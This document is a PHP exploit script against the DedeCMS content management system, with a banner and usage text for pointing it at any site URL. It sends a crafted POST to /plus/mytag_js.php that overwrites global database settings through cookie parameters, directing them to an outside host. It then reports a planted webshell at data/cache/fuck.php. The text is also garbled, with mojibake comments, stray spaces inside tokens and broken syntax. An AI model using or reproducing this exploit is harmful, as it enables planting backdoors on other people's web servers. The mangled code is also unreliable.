############################################################################
############################################################################
/ |/ | / | | | / / | ____| | _ | | | | / ___| / ___/
/ /| /| | / /| | | |/ / | |__ | || | | | | | | | | |__
/ / |_/ | | / / | | | | | | | _ { | | | | | | _ \
/ / | | / / | | | | | |___ | || | | || | | |_| | ___| |
// || // || || \ || |/ \/ \/ /_____/
#! usr/bin/php-w
<? php
error_reporting(E_ERROR);
set_time_limit(0);
print_r(’
DEDEcms Variable Coverage
Exploit Author: [email protected]
’
);
echo “\r\n”;
if($argv[1]==null){
print_r(’
±--------------------------------------------------------------------------+
Usage: php ‘.$ argv[0].’ url
Example:
php ‘.$ argv[0].’ www.site.com
±--------------------------------------------------------------------------+
');
}
$url=$argv[1];
$exp=Getshell($url);
if (strpos($exp,“OK”)>1 2){
echo “[*] Exploit Success \n”;
echo “[*] Shell:”.$ url.“/ data/cache/fuck. php\n” ;
}else{
echo “[*] Exploit Failed \n”;
}
function Getshell($url){ //բ?? ܖؒ? ?? Β?ٗ? բ??? ӄóhell? Ďļ?=$ url;
$port=“8 0”;
$content =“doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js. php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=Trojan&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=Trojan&COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%BD%BB”; //OK բ? Ťփ?
$data = “POST /plus/mytag_js. php? aid=1 HTTP/1.1\r\n”; //IDֵ? ɒԸ?? ݿℚȝ? 仯
$data .= “Host: “.$ host.”\ r\n”;
$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1\r\n”;
$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n”;
$data .= “Accept-Language: EN-us,EN;q=0.5\r\n”;
//$data .= “Accept-Encoding: gzip,deflate\r\n”;
$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;
$data .= “Connection: keep-alive\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “Content-Length: “. strlen($content).”\ r\n\r\n”;
$data .= $content.“\ r\n”;
$ock=fsockopen($host,$port);
if (!$ ock) {
echo “[*] No response from “.$ host.”\ n”;
}
fwrite($ock,$data);
while (! feof($ock)) {
$exp=fgets($ock, 1 0 2 4);
return $exp;
}
}
?& gt;